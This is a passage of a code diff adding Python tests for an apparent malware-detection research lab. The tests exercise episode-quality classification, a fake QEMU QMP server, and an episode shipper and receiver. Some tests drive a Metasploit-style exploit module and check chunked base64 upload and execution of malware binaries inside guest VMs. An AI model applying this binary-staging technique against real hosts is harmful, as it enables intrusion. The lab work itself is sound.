+        for i, (t, p) in enumerate(zip(boundary_ns, names))
+    ]
+    return ("\n".join(json.dumps(r) for r in rows) + "\n").encode()
+
+
+# ---------------------------------------------------------------------------
+# Per-reason classifier tests
+# ---------------------------------------------------------------------------
+
+
+def _make_episode(tmp_path: Path, **member_overrides) -> Path:
+    """Default = a healthy episode with sample, exploit, workload events,
+    sharp CPU envelope. Overrides replace specific members."""
+    n = 60
+    end_ns = n * 100_000_000
+    members = {
+        "01TEST/meta.json": _meta(
+            sample={"name": "xmrig", "kind": "real", "family": "XMRig",
+                    "category": "cryptominer", "profile": "cpu-saturate",
+                    "sha256": "a" * 64},
+            exploit={"module_name": "vsftpd_234_backdoor", "module": "x"},
+        ),
+        "01TEST/events.jsonl": _events([
+            {"event": "snapshot_load"},
+            {"event": "workload_setup"},
+            {"event": "workload_started", "phase": "infected_running"},
+            {"event": "workload_killed", "phase": "dormant",
+             "pre_kill_probe": {"yes": "2", "loadavg": "1.4"}},
+            {"event": "episode_end"},
+        ]),
+        "01TEST/labels.jsonl": _labels(
+            [0, n // 3 * 100_000_000, 2 * n // 3 * 100_000_000],
+            ["clean", "infected_running", "dormant"],
+        ),
+        "01TEST/telemetry-proc.jsonl": _proc_rows(flat=False, n=n),
+    }
+    members.update(member_overrides)
+    out = tmp_path / "01TEST.tar.zst"
+    _make_tar_zst(out, members)
+    return out
+
+
+def test_healthy_episode_has_no_reasons(tmp_path: Path) -> None:
+    tar = _make_episode(tmp_path)
+    q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
+    assert q.reasons == [], f"unexpected reasons: {q.reasons}"
+    assert q.sample_name == "xmrig"
+    assert q.module_name == "vsftpd_234_backdoor"
+
+
+def test_no_sample_flag(tmp_path: Path) -> None:
+    tar = _make_episode(
+        tmp_path,
+        **{"01TEST/meta.json": _meta(sample=None, exploit=None)},
+    )
+    q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
+    assert "no-sample" in q.reasons
+
+
+def test_no_workload_events_flag(tmp_path: Path) -> None:
+    tar = _make_episode(
+        tmp_path,
+        **{"01TEST/events.jsonl": _events([
+            {"event": "snapshot_load"},
+            {"event": "phase_transition", "to": "clean"},
+            {"event": "episode_end"},
+        ])},
+    )
+    q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
+    assert "no-workload-events" in q.reasons
+
+
+def test_workload_failed_flag(tmp_path: Path) -> None:
+    tar = _make_episode(
+        tmp_path,
+        **{"01TEST/events.jsonl": _events([
+            {"event": "workload_setup"},
+            {"event": "workload_failed", "phase": "infected_running",
+             "error": "EOF on serial"},
+            {"event": "episode_end"},
+        ])},
+    )
+    q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
+    assert "workload-failed" in q.reasons
+
+
+def test_workload_silent_flag(tmp_path: Path) -> None:
+    """The elliott-lab fingerprint: dormant probe shows yes=0,
+    meaning the workload never actually fired."""
+    tar = _make_episode(
+        tmp_path,
+        **{"01TEST/events.jsonl": _events([
+            {"event": "workload_setup"},
+            {"event": "workload_started", "phase": "infected_running"},
+            {"event": "workload_killed", "phase": "dormant",
+             "pre_kill_probe": {"yes": "0", "loadavg": "0.18"}},
+        ])},
+    )
+    q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
+    assert "workload-silent" in q.reasons
+
+
+def test_flat_cpu_flag(tmp_path: Path) -> None:
+    """When the proc CPU% spread between phases is < 5pp, the episode
+    has no signal for the trainer to learn from."""
+    tar = _make_episode(
+        tmp_path,
+        **{"01TEST/telemetry-proc.jsonl": _proc_rows(flat=True, n=60)},
+    )
+    q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
+    assert "flat-cpu" in q.reasons
+
+
+# ---------------------------------------------------------------------------
+# Walk + actions
+# ---------------------------------------------------------------------------
+
+
+def _stage_receiver_tree(tmp_path: Path) -> tuple[Path, Path]:
+    """Build a fake /var/lib/cis490 layout with two episodes: one
+    healthy, one flagged for no-sample. Returns (episodes_root, index_path)."""
+    episodes = tmp_path / "episodes"
+    (episodes / "lab1").mkdir(parents=True)
+    healthy = _make_episode(episodes / "lab1" / "01OK")
+    healthy.rename(episodes / "lab1" / "01OK.tar.zst")
+    bad = _make_episode(
+        episodes / "lab1" / "01FAKE",
+        **{"01TEST/meta.json": _meta(sample=None)},
+    )
+    bad.rename(episodes / "lab1" / "01FAKE.tar.zst")
+    index = tmp_path / "index.jsonl"
+    rows = [
+        {"host_id": "lab1", "episode_id": "01OK"},
+        {"host_id": "lab1", "episode_id": "01FAKE"},
+    ]
+    index.write_text("\n".join(json.dumps(r) for r in rows) + "\n")
+    return episodes, index
+
+
+def test_dry_run_does_not_modify_anything(tmp_path: Path, capsys) -> None:
+    episodes, index = _stage_receiver_tree(tmp_path)
+    rc = pe.main([
+        "--episodes-root", str(episodes),
+        "--index", str(index),
+        "--reason", "no-sample",
+    ])
+    # Returns 1 because flagged episodes exist (matches CLI exit semantics).
+    assert rc == 1
+    # Both tarballs still on disk.
+    assert (episodes / "lab1" / "01OK.tar.zst").exists()
+    assert (episodes / "lab1" / "01FAKE.tar.zst").exists()
+    # Index unchanged.
+    assert len(index.read_text().splitlines()) == 2
+
+
+def test_archive_moves_flagged_and_rewrites_index(tmp_path: Path) -> None:
+    episodes, index = _stage_receiver_tree(tmp_path)
+    archive = tmp_path / "archive"
+    rc = pe.main([
+        "--episodes-root", str(episodes),
+        "--index", str(index),
+        "--archive-root", str(archive),
+        "--reason", "no-sample",
+        "--archive",
+    ])
+    assert rc == 1
+    # 01OK kept.
+    assert (episodes / "lab1" / "01OK.tar.zst").exists()
+    # 01FAKE moved.
+    assert not (episodes / "lab1" / "01FAKE.tar.zst").exists()
+    assert (archive / "lab1" / "01FAKE.tar.zst").exists()
+    # Index dropped the bad row.
+    rows = [json.loads(l) for l in index.read_text().splitlines() if l.strip()]
+    assert len(rows) == 1
+    assert rows[0]["episode_id"] == "01OK"
+
+
+def test_delete_removes_flagged_and_rewrites_index(tmp_path: Path) -> None:
+    episodes, index = _stage_receiver_tree(tmp_path)
+    rc = pe.main([
+        "--episodes-root", str(episodes),
+        "--index", str(index),
+        "--reason", "no-sample",
+        "--delete",
+    ])
+    assert rc == 1
+    assert not (episodes / "lab1" / "01FAKE.tar.zst").exists()
+    rows = [json.loads(l) for l in index.read_text().splitlines() if l.strip()]
+    assert len(rows) == 1
+
+
+def test_host_filter_scopes_to_one_lab_host(tmp_path: Path) -> None:
+    episodes, index = _stage_receiver_tree(tmp_path)
+    rc = pe.main([
+        "--episodes-root", str(episodes),
+        "--index", str(index),
+        "--reason", "no-sample",
+        "--host", "lab2",  # nothing matches
+    ])
+    assert rc == 0  # zero flagged → exit 0
+    assert (episodes / "lab1" / "01FAKE.tar.zst").exists()
+
+
+def test_multiple_reasons_combine(tmp_path: Path) -> None:
+    """An episode failing >1 signal is flagged once, all reasons listed."""
+    tar = _make_episode(
+        tmp_path,
+        **{"01TEST/meta.json": _meta(sample=None),
+           "01TEST/events.jsonl": _events([{"event": "snapshot_load"}])},
+    )
+    q = pe.classify_episode(tar, host_id="x", episode_id="01TEST")
+    assert "no-sample" in q.reasons
+    assert "no-workload-events" in q.reasons
+    assert q.fake
--- a/tests/test_qmp.py
+++ b/tests/test_qmp.py
@ -0,0 +1,333 @@
+"""Tests for the QMP collector against an in-process fake QMP server.
+
+The fake speaks just enough QMP to exercise:
+  - the greeting + qmp_capabilities handshake
+  - query-status
+  - query-blockstats
+  - query-stats target=vm
+  - error responses
+  - async events interleaved with command responses
+"""
+
+from __future__ import annotations
+
+import json
+import socket
+import tempfile
+import threading
+import time
+from pathlib import Path
+from typing import Any
+
+import pytest
+
+from collectors import qmp
+
+
+# ---------------------------------------------------------------------------
+# Fake QMP server
+# ---------------------------------------------------------------------------
+
+
+class FakeQMPServer(threading.Thread):
+    """Single-connection fake. Each line received from the client is
+    parsed as JSON; we look up ``execute`` in ``responses`` and emit
+    the configured reply. Optionally interleaves an async event before
+    the response."""
+
+    def __init__(
+        self,
+        socket_path: Path,
+        *,
+        responses: dict[str, Any] | None = None,
+        emit_event_before: set[str] | None = None,
+    ) -> None:
+        super().__init__(daemon=True)
+        self.socket_path = socket_path
+        self.responses = responses or {}
+        self.emit_event_before = emit_event_before or set()
+        self.received: list[dict] = []
+        self._stop = threading.Event()
+        self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
+        self._sock.bind(str(socket_path))
+        self._sock.listen(1)
+        self._sock.settimeout(5.0)
+
+    def run(self) -> None:
+        try:
+            conn, _ = self._sock.accept()
+        except socket.timeout:
+            return
+        conn.settimeout(5.0)
+        try:
+            # Greeting
+            conn.sendall(b'{"QMP": {"version": {"qemu": {"major":9,"minor":0,"micro":0}}, "capabilities": []}}\n')
+            buf = b""
+            while not self._stop.is_set():
+                try:
+                    chunk = conn.recv(4096)
+                except socket.timeout:
+                    if self._stop.is_set():
+                        return
+                    continue
+                if not chunk:
+                    return
+                buf += chunk
+                while b"\n" in buf:
+                    line, _, buf = buf.partition(b"\n")
+                    if not line.strip():
+                        continue
+                    msg = json.loads(line)
+                    self.received.append(msg)
+                    cmd = msg.get("execute")
+                    if cmd == "qmp_capabilities":
+                        conn.sendall(b'{"return": {}}\n')
+                        continue
+                    if cmd in self.emit_event_before:
+                        conn.sendall(b'{"event": "STOP", "timestamp": {"seconds": 1, "microseconds": 0}}\n')
+                    if cmd in self.responses:
+                        resp = self.responses[cmd]
+                        conn.sendall((json.dumps(resp) + "\n").encode())
+                    else:
+                        conn.sendall(b'{"error": {"class": "CommandNotFound", "desc": "unknown"}}\n')
+        finally:
+            conn.close()
+
+    def shutdown(self) -> None:
+        self._stop.set()
+        try:
+            self._sock.close()
+        except OSError:
+            pass
+
+
+@pytest.fixture
+def qmp_server(tmp_path: Path):
+    sock_path = tmp_path / "qmp.sock"
+    return sock_path
+
+
+# ---------------------------------------------------------------------------
+# Client tests
+# ---------------------------------------------------------------------------
+
+
+def test_connect_negotiates_capabilities(qmp_server: Path) -> None:
+    server = FakeQMPServer(qmp_server)
+    server.start()
+    try:
+        client = qmp.QMPClient(qmp_server)
+        greeting = client.connect()
+        assert "version" in greeting
+    finally:
+        client.close()
+        server.shutdown()
+    # Server saw exactly the qmp_capabilities call.
+    assert any(m.get("execute") == "qmp_capabilities" for m in server.received)
+
+
+def test_execute_returns_payload(qmp_server: Path) -> None:
+    server = FakeQMPServer(
+        qmp_server,
+        responses={
+            "query-status": {"return": {"status": "running", "running": True}},
+        },
+    )
+    server.start()
+    try:
+        client = qmp.QMPClient(qmp_server)
+        client.connect()
+        out = client.execute("query-status")
+        assert out == {"status": "running", "running": True}
+    finally:
+        client.close()
+        server.shutdown()
+
+
+def test_execute_skips_async_events_before_response(qmp_server: Path) -> None:
+    server = FakeQMPServer(
+        qmp_server,
+        responses={
+            "query-status": {"return": {"status": "running", "running": True}},
+        },
+        emit_event_before={"query-status"},
+    )
+    server.start()
+    try:
+        client = qmp.QMPClient(qmp_server)
+        client.connect()
+        out = client.execute("query-status")
+        assert out["running"] is True
+    finally:
+        client.close()
+        server.shutdown()
+
+
+def test_execute_raises_on_qmp_error(qmp_server: Path) -> None:
+    server = FakeQMPServer(qmp_server)  # no responses → server sends error
+    server.start()
+    try:
+        client = qmp.QMPClient(qmp_server)
+        client.connect()
+        with pytest.raises(qmp.QMPError):
+            client.execute("totally-fake-command")
+    finally:
+        client.close()
+        server.shutdown()
+
+
+# ---------------------------------------------------------------------------
+# Row builder tests
+# ---------------------------------------------------------------------------
+
+
+def test_collect_once_assembles_full_row(qmp_server: Path) -> None:
+    server = FakeQMPServer(
+        qmp_server,
+        responses={
+            "query-status": {"return": {"status": "running", "running": True}},
+            "query-blockstats": {"return": [{
+                "device": "virtio0",
+                "stats": {
+                    "rd_operations": 12, "wr_operations": 4,
+                    "rd_bytes": 49152, "wr_bytes": 16384,
+                    "flush_operations": 1,
+                },
+            }]},
+            "query-stats": {"return": [{"stats": [
+                {"name": "halt_exits", "value": 17000},
+                {"name": "io_exits",   "value": 942},
+                {"name": "string-skipped", "value": "not-an-int"},
+            ]}]},
+        },
+    )
+    server.start()
+    try:
+        client = qmp.QMPClient(qmp_server)
+        client.connect()
+        row = qmp.collect_once(client, t_mono_origin_ns=time.monotonic_ns())
+    finally:
+        client.close()
+        server.shutdown()
+
+    assert row["source"] == "host_qmp"
+    assert row["available_in_deployment"] is False
+    assert row["vm_running"] is True
+    assert row["blockstats"]["virtio0"]["rd_bytes"] == 49152
+    assert row["blockstats"]["virtio0"]["flush_ops"] == 1
+    assert row["kvm_stats"]["halt_exits"] == 17000
+    assert "string-skipped" not in row["kvm_stats"]
+
+
+def test_collect_once_tolerates_missing_query_stats(qmp_server: Path) -> None:
+    server = FakeQMPServer(
+        qmp_server,
+        responses={
+            "query-status": {"return": {"status": "running", "running": True}},
+            "query-blockstats": {"return": []},
+            # query-stats deliberately absent → server returns CommandNotFound
+        },
+    )
+    server.start()
+    try:
+        client = qmp.QMPClient(qmp_server)
+        client.connect()
+        row = qmp.collect_once(client, t_mono_origin_ns=time.monotonic_ns())
+    finally:
+        client.close()
+        server.shutdown()
+
+    # Older qemu without query-stats: row still exists, kvm_stats absent.
+    assert "kvm_stats" not in row
+    assert row["vm_running"] is True
+    assert row["blockstats"] == {}
+
+
+# ---------------------------------------------------------------------------
+# run_loop tests
+# ---------------------------------------------------------------------------
+
+
+def test_run_loop_writes_rows_and_stops_cleanly(qmp_server: Path, tmp_path: Path) -> None:
+    server = FakeQMPServer(
+        qmp_server,
+        responses={
+            "query-status": {"return": {"status": "running", "running": True}},
+            "query-blockstats": {"return": []},
+            "query-stats": {"error": {"class": "CommandNotFound", "desc": "n/a"}},
+        },
+    )
+    server.start()
+    out_path = tmp_path / "telemetry-qmp.jsonl"
+    stop = threading.Event()
+
+    def stop_after(ms: int) -> None:
+        time.sleep(ms / 1000.0)
+        stop.set()
+
+    threading.Thread(target=stop_after, args=(350,), daemon=True).start()
+    rows = qmp.run_loop(
+        socket_path=qmp_server,
+        output_path=out_path,
+        t_mono_origin_ns=time.monotonic_ns(),
+        interval_ms=100,
+        stop_event=stop,
+    )
+    server.shutdown()
+
+    assert rows >= 2, f"expected >=2 rows, got {rows}"
+    lines = [json.loads(l) for l in out_path.read_text().splitlines()]
+    assert len(lines) == rows
+    for r in lines:
+        assert r["source"] == "host_qmp"
+        assert r["vm_running"] is True
+
+
+def test_savevm_and_loadvm_via_human_monitor(qmp_server: Path) -> None:
+    server = FakeQMPServer(
+        qmp_server,
+        responses={
+            "human-monitor-command": {"return": ""},
+        },
+    )
+    server.start()
+    try:
+        client = qmp.QMPClient(qmp_server)
+        client.connect()
+        out_save = client.savevm("baseline")
+        out_load = client.loadvm("baseline")
+        assert out_save == ""
+        assert out_load == ""
+    finally:
+        client.close()
+        server.shutdown()
+    # Both calls go out as human-monitor-command with the right cmdline.
+    hmcs = [m for m in server.received if m.get("execute") == "human-monitor-command"]
+    cmds = [m["arguments"]["command-line"] for m in hmcs]
+    assert "savevm baseline" in cmds
+    assert "loadvm baseline" in cmds
+
+
+def test_loadvm_surface_error(qmp_server: Path) -> None:
+    server = FakeQMPServer(qmp_server)  # no responses → error reply
+    server.start()
+    try:
+        client = qmp.QMPClient(qmp_server)
+        client.connect()
+        with pytest.raises(qmp.QMPError):
+            client.loadvm("does-not-exist")
+    finally:
+        client.close()
+        server.shutdown()
+
+
+def test_run_loop_returns_zero_when_socket_missing(tmp_path: Path) -> None:
+    # No server bound to the socket path.
+    rows = qmp.run_loop(
+        socket_path=tmp_path / "nonexistent.sock",
+        output_path=tmp_path / "telemetry-qmp.jsonl",
+        t_mono_origin_ns=time.monotonic_ns(),
+        interval_ms=100,
+        stop_event=threading.Event(),
+    )
+    assert rows == 0
--- a/tests/test_shipper.py
+++ b/tests/test_shipper.py
@ -0,0 +1,327 @@
+"""End-to-end shipper tests.
+
+These run a real Uvicorn server bound to 127.0.0.1 on a free port,
+hosting the actual receiver Starlette app over an EpisodeStore on a
+temp dir. The shipper then talks to that server with its real
+`httpx.Client` — same code path as production. This catches things
+the receiver-side ASGI tests can't (HTTP framing, header handling,
+sync httpx behaviour, content-length quirks).
+"""
+
+from __future__ import annotations
+
+import json
+import socket
+import threading
+import time
+from pathlib import Path
+
+import httpx
+import pytest
+import uvicorn
+
+from receiver.app import make_app
+from receiver.store import EpisodeStore
+from shipper.config import ReceiverEndpoint, ShipperConfig
+from shipper.queue import ShipperQueue
+from shipper.transport import ShipperTransport
+
+
+# ---------------------------------------------------------------------------
+# Live-receiver fixture
+# ---------------------------------------------------------------------------
+
+
+def _free_port() -> int:
+    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
+        s.bind(("127.0.0.1", 0))
+        return s.getsockname()[1]
+
+
+class _ServerThread(threading.Thread):
+    def __init__(self, app, port: int) -> None:
+        super().__init__(daemon=True)
+        cfg = uvicorn.Config(
+            app,
+            host="127.0.0.1",
+            port=port,
+            log_level="error",
+            lifespan="off",
+            access_log=False,
+        )
+        self.server = uvicorn.Server(cfg)
+
+    def run(self) -> None:
+        self.server.run()
+
+    def stop(self) -> None:
+        self.server.should_exit = True
+
+
+def _wait_for_port(port: int, timeout_s: float = 5.0) -> None:
+    deadline = time.monotonic() + timeout_s
+    while time.monotonic() < deadline:
+        try:
+            with httpx.Client(timeout=0.5) as c:
+                r = c.get(f"http://127.0.0.1:{port}/v1/health")
+                if r.status_code == 200:
+                    return
+        except httpx.HTTPError:
+            pass
+        time.sleep(0.05)
+    raise TimeoutError(f"receiver on 127.0.0.1:{port} did not come up")
+
+
+@pytest.fixture
+def store(tmp_path: Path) -> EpisodeStore:
+    return EpisodeStore(
+        store_root=tmp_path / "rcv-episodes",
+        incoming_root=tmp_path / "rcv-incoming",
+        index_path=tmp_path / "rcv-index.jsonl",
+    )
+
+
+@pytest.fixture
+def receiver(store: EpisodeStore):
+    app = make_app(store=store, max_episode_bytes=10_000_000, bearer_token=None)
+    port = _free_port()
+    server = _ServerThread(app, port)
+    server.start()
+    try:
+        _wait_for_port(port)
+        yield f"http://127.0.0.1:{port}", store
+    finally:
+        server.stop()
+        server.join(timeout=2)
+
+
+@pytest.fixture
+def receiver_with_bearer(store: EpisodeStore):
+    app = make_app(store=store, max_episode_bytes=10_000_000, bearer_token="s3cret")
+    port = _free_port()
+    server = _ServerThread(app, port)
+    server.start()
+    try:
+        _wait_for_port(port)
+        yield f"http://127.0.0.1:{port}", store
+    finally:
+        server.stop()
+        server.join(timeout=2)
+
+
+def _make_shipper(
+    tmp_path: Path,
+    receiver_url: str,
+    *,
+    host_id: str = "lab1",
+    bearer: str | None = None,
+) -> tuple[ShipperConfig, ShipperTransport, ShipperQueue]:
+    data_root = tmp_path / "lab-data"
+    cfg = ShipperConfig(
+        host_id=host_id,
+        data_root=data_root,
+        receiver=ReceiverEndpoint(url=receiver_url, bearer_token=bearer),
+        scan_interval_s=0.05,
+    )
+    transport = ShipperTransport(cfg)
+    queue = ShipperQueue(cfg, transport)
+    return cfg, transport, queue
+
+
+def _make_episode(cfg: ShipperConfig, episode_id: str, *, content: bytes = b"data") -> Path:
+    ep = cfg.episodes_dir / episode_id
+    ep.mkdir(parents=True, exist_ok=True)
+    (ep / "meta.json").write_bytes(content)
+    (ep / "events.jsonl").write_text("{}\n")
+    (ep / "labels.jsonl").write_text("{}\n")
+    (ep / "telemetry-proc.jsonl").write_text("{}\n")
+    (ep / "done.marker").touch()
+    return ep
+
+
+# ---------------------------------------------------------------------------
+# Ping
+# ---------------------------------------------------------------------------
+
+
+def test_ping_returns_ok_against_running_receiver(tmp_path: Path, receiver) -> None:
+    url, _ = receiver
+    _, transport, _ = _make_shipper(tmp_path, url)
+    res = transport.ping()
+    assert res.ok is True
+    assert res.status_code == 200
+    assert res.body is not None
+    assert res.body["ok"] is True
+    assert res.body["host_id"] == "lab1"
+    assert res.body["schema_version"] == 1
+
+
+def test_ping_writes_nothing_to_index(tmp_path: Path, receiver) -> None:
+    url, store = receiver
+    _, transport, _ = _make_shipper(tmp_path, url)
+    transport.ping()
+    transport.ping()
+    transport.ping()
+    assert store.index_path.read_text() == ""
+
+
+def test_ping_fails_with_wrong_bearer(tmp_path: Path, receiver_with_bearer) -> None:
+    url, _ = receiver_with_bearer
+    _, transport, _ = _make_shipper(tmp_path, url, bearer="WRONG")
+    res = transport.ping()
+    assert res.ok is False
+    assert res.status_code == 401
+
+
+def test_ping_succeeds_with_right_bearer(tmp_path: Path, receiver_with_bearer) -> None:
+    url, _ = receiver_with_bearer
+    _, transport, _ = _make_shipper(tmp_path, url, bearer="s3cret")
+    res = transport.ping()
+    assert res.ok is True
+    assert res.status_code == 200
+
+
+def test_ping_fails_when_receiver_unreachable(tmp_path: Path) -> None:
+    # Pick a free port and don't bind it — connect must fail.
+    port = _free_port()
+    _, transport, _ = _make_shipper(tmp_path, f"http://127.0.0.1:{port}")
+    res = transport.ping()
+    assert res.ok is False
+    assert res.status_code == 0
+    assert res.error is not None
+
+
+# ---------------------------------------------------------------------------
+# Tar + ship
+# ---------------------------------------------------------------------------
+
+
+def test_run_once_ships_one_done_episode(tmp_path: Path, receiver) -> None:
+    url, store = receiver
+    cfg, _, queue = _make_shipper(tmp_path, url)
+    _make_episode(cfg, "01EPISODE")
+
+    result = queue.run_once()
+    assert result.scanned == 1
+    assert result.shipped == 1
+    assert result.transient_failures == 0
+
+    # Episode dir moved to shipped/.
+    assert not (cfg.episodes_dir / "01EPISODE").exists()
+    assert (cfg.shipped_dir / "01EPISODE").exists()
+
+    # Outbox tarball cleaned up.
+    assert list(cfg.outbox_dir.iterdir()) == []
+
+    # Receiver stored it and indexed it.
+    assert store.final_path("lab1", "01EPISODE").exists()
+    rows = [json.loads(l) for l in store.index_path.read_text().splitlines()]
+    assert len(rows) == 1
+    assert rows[0]["host_id"] == "lab1"
+    assert rows[0]["episode_id"] == "01EPISODE"
+
+
+def test_run_once_skips_episodes_without_done_marker(tmp_path: Path, receiver) -> None:
+    url, store = receiver
+    cfg, _, queue = _make_shipper(tmp_path, url)
+    ep = cfg.episodes_dir / "01PARTIAL"
+    ep.mkdir(parents=True)
+    (ep / "meta.json").write_text("{}")
+    # Note: NO done.marker.
+
+    result = queue.run_once()
+    assert result.scanned == 0
+    assert result.shipped == 0
+    assert ep.exists()  # untouched
+    assert store.index_path.read_text() == ""
+
+
+def test_run_once_idempotent_re_ship_returns_already_present(tmp_path: Path, receiver) -> None:
+    """If a prior run shipped an episode but crashed before retiring it,
+    the next run must re-ship the same bytes successfully (200) and
+    retire the dir, not flag it as a conflict."""
+    url, store = receiver
+    cfg, _, queue = _make_shipper(tmp_path, url)
+    _make_episode(cfg, "01REPLAY", content=b"same-bytes")
+
+    queue.run_once()
+    assert (cfg.shipped_dir / "01REPLAY").exists()
+
+    # Simulate a crash: move it back as if retire never happened.
+    (cfg.shipped_dir / "01REPLAY").rename(cfg.episodes_dir / "01REPLAY")
+
+    result = queue.run_once()
+    assert result.scanned == 1
+    assert result.shipped == 1
+    assert (cfg.shipped_dir / "01REPLAY").exists()
+
+    # Index didn't double up.
+    rows = store.index_path.read_text().splitlines()
+    assert len(rows) == 1
+
+
+def test_run_once_handles_409_conflict(tmp_path: Path, receiver) -> None:
+    """If the same episode_id was previously shipped with *different*
+    bytes, the receiver returns 409 and the shipper must NOT retire
+    the local dir — operator triage required."""
+    url, _ = receiver
+    cfg, _, queue = _make_shipper(tmp_path, url)
+    _make_episode(cfg, "01CONFLICT", content=b"first")
+
+    result = queue.run_once()
+    assert result.shipped == 1
+
+    # Simulate a re-do with different content but the same id (e.g., a
+    # botched re-run on the lab host).
+    (cfg.shipped_dir / "01CONFLICT").rename(cfg.episodes_dir / "01CONFLICT")
+    (cfg.episodes_dir / "01CONFLICT" / "meta.json").write_bytes(b"tampered")
+
+    result = queue.run_once()
+    assert result.scanned == 1
+    assert result.shipped == 0
+    assert result.conflicts == 1
+    # Local dir survives — operator can decide what to do.
+    assert (cfg.episodes_dir / "01CONFLICT").exists()
+
+
+def test_run_once_handles_transient_when_receiver_is_down(tmp_path: Path) -> None:
+    port = _free_port()
+    cfg, _, queue = _make_shipper(tmp_path, f"http://127.0.0.1:{port}")
+    _make_episode(cfg, "01DOWN")
+
+    result = queue.run_once()
+    assert result.scanned == 1
+    assert result.shipped == 0
+    assert result.transient_failures == 1
+    # Episode dir + tarball both stay in place for the next pass.
+    assert (cfg.episodes_dir / "01DOWN").exists()
+    assert (cfg.outbox_dir / "01DOWN.tar.zst").exists()
+
+
+def test_tarball_round_trips_episode_dir(tmp_path: Path, receiver) -> None:
+    """The receiver-side tarball must extract back to the original
+    episode dir layout (modulo file order). Verifies the tar+zstd
+    pipe is intact."""
+    import subprocess
+    import tarfile
+
+    url, _ = receiver
+    cfg, _, queue = _make_shipper(tmp_path, url)
+    ep = _make_episode(cfg, "01ROUND", content=b"meta-bytes")
+    expected_files = sorted(p.name for p in ep.iterdir())
+
+    queue.run_once()
+
+    # The receiver stored it; pull the bytes back, decompress + untar.
+    rcv_path = next((tmp_path / "rcv-episodes" / "lab1").glob("01ROUND.tar.zst"))
+    decompressed = tmp_path / "01ROUND.tar"
+    subprocess.check_call(
+        ["zstd", "-q", "-d", "-o", str(decompressed), str(rcv_path)],
+    )
+    extract_dir = tmp_path / "extracted"
+    extract_dir.mkdir()
+    with tarfile.open(decompressed) as tf:
+        tf.extractall(extract_dir)
+
+    got_files = sorted(p.name for p in (extract_dir / "01ROUND").iterdir())
+    assert got_files == expected_files
--- a/tests/test_tier4.py
+++ b/tests/test_tier4.py
@ -0,0 +1,258 @@
+"""Tests for the Tier-4 path:
+  - real_binary_workload constructs valid shell commands
+  - Sample.binary_path resolves correctly
+  - MSFExploitDriver.real-sample dispatch picks the upload+exec path
+    when a binary is staged, mimic when it isn't
+  - tools/fetch_sample input validation (we don't hit the live API)
+"""
+
+from __future__ import annotations
+
+import hashlib
+from pathlib import Path
+
+import pytest
+
+from exploits.driver import DriverConfig, MSFExploitDriver
+from exploits.modules import load_module_config
+from exploits.workloads import (
+    chunked_real_binary_upload, real_binary_workload,
+)
+from samples.manifest import Sample
+
+
+REPO_ROOT = Path(__file__).resolve().parent.parent
+MODULES_DIR = REPO_ROOT / "exploits" / "modules"
+
+
+# Reuse the FakeMSFRpcClient from test_exploits.py.
+from tests.test_exploits import FakeMSFRpcClient  # noqa: E402
+
+
+# ---------------------------------------------------------------------------
+# real_binary_workload
+# ---------------------------------------------------------------------------
+
+
+def test_real_binary_workload_embeds_base64() -> None:
+    payload = b"\x7fELF" + b"\x00" * 64  # tiny ELF-shaped header
+    w = real_binary_workload(payload)
+    # Start command bundles a chunked upload (printf '%s' '<b64>' >> file).
+    # Pull all b64 segments out and confirm they round-trip.
+    import base64 as _b64
+    import re
+    matches = re.findall(r"printf '%s' '([A-Za-z0-9+/=]+)'", w.start_cmd)
+    assert matches, "expected printf-based b64 chunks in start_cmd"
+    decoded = _b64.b64decode("".join(matches))
+    assert decoded == payload
+
+
+def test_chunked_real_binary_upload_splits_correctly() -> None:
+    """A binary larger than the chunk size should produce >1 chunks
+    plus a finalize + exec. Each chunk's payload must be individually
+    valid base64 and the concatenation must round-trip."""
+    import base64 as _b64
+    import hashlib as _hashlib
+    import re
+
+    # Build a payload large enough to force multiple chunks.
+    payload = (b"\x90\xab" * 8000)
+    plan = chunked_real_binary_upload(payload)
+    assert plan.n_chunks >= 3  # 1 init + 2+ data chunks
+    assert plan.expected_sha256 == _hashlib.sha256(payload).hexdigest()
+
+    # Reconstruct from chunks.
+    segs = []
+    for c in plan.chunks:
+        m = re.search(r"printf '%s' '([A-Za-z0-9+/=]+)'", c)
+        if m:
+            segs.append(m.group(1))
+    assert segs, "no data chunks parsed"
+    decoded = _b64.b64decode("".join(segs))
+    assert decoded == payload
+
+    # finalize_cmd verifies the sha256 we computed.
+    assert plan.expected_sha256 in plan.finalize_cmd
+    assert "sha256sum" in plan.finalize_cmd
+
+
+def test_real_binary_workload_stop_kills_pidfile() -> None:
+    w = real_binary_workload(b"x" * 16)
+    assert "kill" in w.stop_cmd
+    assert ".cis490-real" in w.stop_cmd
+
+
+def test_real_binary_workload_per_profile_isolation() -> None:
+    a = real_binary_workload(b"\x00", sample=Sample(name="a", family="A", category="rat", profile="cpu-saturate"))
+    b = real_binary_workload(b"\x00", sample=Sample(name="b", family="B", category="rat", profile="bursty-c2"))
+    # Different profiles → different /tmp paths so concurrent samples
+    # don't stomp each other in the same guest.
+    assert a.profile != b.profile
+    assert a.start_cmd != b.start_cmd
+
+
+# ---------------------------------------------------------------------------
+# Sample.binary_path
+# ---------------------------------------------------------------------------
+
+
+def test_binary_path_resolves_when_staged(tmp_path: Path) -> None:
+    sha = "a" * 64
+    (tmp_path / sha).write_bytes(b"hello")
+    s = Sample(name="x", family="X", category="rat", profile="cpu-saturate", sha256=sha)
+    assert s.binary_path(tmp_path) == tmp_path / sha
+
+
+def test_binary_path_none_when_missing(tmp_path: Path) -> None:
+    s = Sample(name="x", family="X", category="rat", profile="cpu-saturate", sha256="b" * 64)
+    assert s.binary_path(tmp_path) is None
+
+
+def test_binary_path_none_for_mimic_sample(tmp_path: Path) -> None:
+    s = Sample(name="x", family="X", category="rat", profile="cpu-saturate")
+    assert s.binary_path(tmp_path) is None
+
+
+# ---------------------------------------------------------------------------
+# Driver dispatch
+# ---------------------------------------------------------------------------
+
+
+def test_driver_picks_real_binary_when_staged(tmp_path: Path) -> None:
+    payload = b"\x7fELF\x02" + b"\x00" * 60
+    sha = hashlib.sha256(payload).hexdigest()
+    (tmp_path / sha).write_bytes(payload)
+
+    sample = Sample(
+        name="real-x", family="X", category="rat",
+        profile="cpu-saturate", sha256=sha,
